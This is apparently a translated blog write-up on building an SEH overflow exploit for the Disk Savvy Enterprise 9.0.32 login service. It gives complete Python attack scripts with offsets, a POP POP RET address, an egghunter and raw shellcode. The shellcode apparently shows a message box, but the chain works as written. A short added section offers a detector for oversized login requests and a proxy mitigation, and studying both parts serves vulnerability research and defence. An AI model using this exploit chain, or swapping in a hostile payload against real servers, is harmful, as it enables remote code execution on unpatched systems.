[Original] Disk Savvy Enterprise 9.0.32 (SEH overflow)
2017-3-4 10:31
Vulnerability: https://www.exploit-db.com/exploits/40459/
Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow
Environment: VirtualBox Win7 Enterprise + Disk Savvy Enterprise 9.0.32 + Immunity Debugger + IDA
Run Disk Savvy Enterprise 9.0.32. The interface:
This is only the client side of the software; configure it to enable the built-in HTTP service.
Attach Immunity Debugger to the disksvs.exe process.
```python
# Python 2 script: str values are sent as raw bytes
import socket
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.1.114', 80))
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "A" * 20000
s.send(evil)
s.close()
```
The program raises an exception; the SEH chain has been overwritten with AAAA.
Next, construct the SEH payload:
[junk][nSEH][SEH][nop+shellcode]
Next we need to determine the size that triggers the exception, the position of SEH, and a "POP POP RET".
```python
evil += "&password=aaaaa\r\n"
evil += "A" * 12000
evil += "\x90" * 10000
```
The exception triggers; computing the SEH address gives a difference of 2292.
Use the mona.py plugin (!mona seh) to find a "POP POP RET".
Change the payload to:
```python
seh = "\xac\x43\x0c\x10"
nseh = "\xEB\x0B\x90\x90"
evil += "A" * 14292
evil += nseh
evil += seh
evil += "\x90" * 10000
s.send(evil)
s.close()
```
It executes successfully, but the memory available for placing the shellcode is too small, so an egghunter is used to locate the shellcode in memory and then execute it.
Egghunter code:
```python
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
egg = "w00tw00t"
```
Finally, add the payload:
```python
# Python 2 script: str values are sent as raw bytes
import socket
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.1.114', 80))
seh = "\xac\x43\x0c\x10"
nseh = "\xEB\x0B\x90\x90"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "A" * 14057
evil += "w00tw00t"      # egg marker the egghunter searches for
evil += shellcode
evil += nseh
evil += seh
evil += egghunter
evil += "\x90" * 10000
s.send(evil)
s.close()
```
Finally, the faulty code is the getnextstring function in the libspp.dll module, which copies the received value into heap address a5 without a length check and thereby triggers the exception.
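Since the root cause is a login POST body copied without a length check, the request shape that triggers the crash above is easy to recognise on the wire. The following is an added defender-side check, not code from the original post; the size thresholds and the sample requests are constructed assumptions.

```python
MAX_LOGIN_BODY = 1024   # assumed sane upper bound for a login form body
MAX_REPEAT_RUN = 256    # assumed: longer runs of one byte look like filler

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best

def check_login_request(raw: bytes) -> list:
    """Return the reasons a login POST looks like an overflow attempt."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if method != b"POST" or path != b"/login":
        return reasons
    declared = int(headers.get(b"content-length", b"0"))
    if declared > MAX_LOGIN_BODY:
        reasons.append(f"content-length {declared} exceeds {MAX_LOGIN_BODY}")
    if len(body) > MAX_LOGIN_BODY:
        reasons.append(f"body of {len(body)} bytes exceeds {MAX_LOGIN_BODY}")
    if len(body) > declared:
        reasons.append(f"body ({len(body)}) longer than content-length ({declared})")
    run = longest_run(body)
    if run > MAX_REPEAT_RUN:
        reasons.append(f"repeated-byte run of {run} bytes")
    return reasons

# Constructed samples: a normal login and one shaped like the crash trigger above.
NORMAL = (b"POST /login HTTP/1.1\r\nHost: 192.0.2.10\r\n"
          b"Content-Length: 31\r\n\r\nusername=admin&password=hunter2")
OVERSIZED = (b"POST /login HTTP/1.1\r\nHost: 192.0.2.10\r\n"
             b"Content-Length: 17000\r\n\r\n"
             b"username=admin&password=aaaaa\r\n" + b"A" * 20000)
```

The same check can be applied in a reverse proxy in front of the service until the vendor fix is deployed, rejecting any login body above the threshold before it reaches disksvs.exe.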